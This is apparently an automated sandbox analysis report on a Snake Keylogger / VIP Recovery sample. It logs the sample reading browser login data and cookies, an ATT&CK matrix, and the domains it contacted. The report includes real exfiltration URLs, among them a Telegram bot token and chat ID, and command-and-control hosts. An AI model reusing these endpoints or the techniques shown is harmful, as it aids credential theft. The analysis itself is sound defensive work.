            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\r5yYt97sfB.exeCode function: 1_2_004061A5 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,1_2_004061A5

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7864, type: MEMORYSTR
            Source: Yara matchFile source: 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7864, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7864, type: MEMORYSTR
            Source: Yara matchFile source: 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Obfuscated Files or Information
            1
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            PowerShell
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Software Packing
            LSASS Memory14
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection
            1
            DLL Side-Loading
            Security Account Manager11
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
            Virtualization/Sandbox Evasion
            LSA Secrets21
            Virtualization/Sandbox Evasion
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587710 Sample: r5yYt97sfB.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 36 reallyfreegeoip.org 2->36 38 api.telegram.org 2->38 40 4 other IPs or domains 2->40 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Multi AV Scanner detection for dropped file 2->50 56 6 other signatures 2->56 8 r5yYt97sfB.exe 32 2->8         started        signatures3 52 Tries to detect the country of the analysis system (by using the IP) 36->52 54 Uses the Telegram API (likely for C&C communication) 38->54 process4 file5 22 C:\Users\user\AppData\...\Dipterologist.Fra, Unicode 8->22 dropped 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->24 dropped 58 Suspicious powershell command line found 8->58 12 powershell.exe 30 8->12         started        signatures6 process7 file8 26 C:\Users\user\AppData\...\r5yYt97sfB.exe, PE32 12->26 dropped 28 C:\Users\...\r5yYt97sfB.exe:Zone.Identifier, ASCII 12->28 dropped 60 Early bird code injection technique detected 12->60 62 Writes to foreign memory regions 12->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 12->64 66 3 other signatures 12->66 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 30 checkip.dyndns.com 132.226.8.169, 59372, 59375, 59377 UTMEMUS United States 16->30 32 api.telegram.org 149.154.167.220, 443, 59389, 59390 TELEGRAMRU United Kingdom 16->32 34 3 other IPs or domains 16->34 42 Tries to steal Mail credentials (via file / registry access) 16->42 44 Tries to harvest and steal browser information (history, passwords, etc) 16->44 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            r5yYt97sfB.exe72%VirustotalBrowse
            r5yYt97sfB.exe55%ReversingLabsWin32.Spyware.Snakekeylogger
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nss7012.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\r5yYt97sfB.exe55%ReversingLabsWin32.Spyware.Snakekeylogger
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            216.58.206.46
            truefalse
              high
              drive.usercontent.google.com
              142.250.186.129
              truefalse
                high
                reallyfreegeoip.org
                104.21.80.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.8.169
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          https://api.telegram.org/bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                            high
                            https://api.telegram.org/bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                              high
                              http://checkip.dyndns.org/false
                                high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/msiexec.exe, 0000000B.00000002.3827428231.0000000025EC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/chrome_newtabmsiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.orgmsiexec.exe, 0000000B.00000002.3827428231.0000000025F02000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/botmsiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://translate.google.com/translate_a/element.jsmsiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.office.com/lBmsiexec.exe, 0000000B.00000002.3827428231.0000000025EBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.usercontent.google.com/msiexec.exe, 0000000B.00000003.2685537438.000000000A195000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgmsiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nsis.sf.net/NSIS_ErrorErrorr5yYt97sfB.exe, r5yYt97sfB.exe.5.drfalse
                                                            high
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://chrome.google.com/webstore?hl=enmsiexec.exe, 0000000B.00000002.3827428231.0000000025E92000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025EC4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025E83000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.ecosia.org/newtab/msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://varders.kozow.com:8081msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://aborters.duckdns.org:8081msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ac.ecosia.org/autocomplete?q=msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.google.commsiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://51.38.247.67:8081/_send_.php?Lmsiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://drive.google.com/msiexec.exe, 0000000B.00000002.3814361627.000000000A11A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://anotherarmy.dns.army:8081msiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 0000000B.00000002.3827428231.0000000025E8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 0000000B.00000002.3827428231.0000000025DBB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025D75000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://api.telegram.org/bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.orgmsiexec.exe, 0000000B.00000002.3827428231.0000000025DBB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025D4B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://apis.google.commsiexec.exe, 0000000B.00000003.2652184692.000000000A19C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2652094737.000000000A19C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://api.telegram.orgmsiexec.exe, 0000000B.00000002.3827428231.0000000025F02000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827428231.0000000025EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsiexec.exe, 0000000B.00000002.3827428231.0000000025D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 0000000B.00000002.3828910007.0000000027011000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828910007.0000000026D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
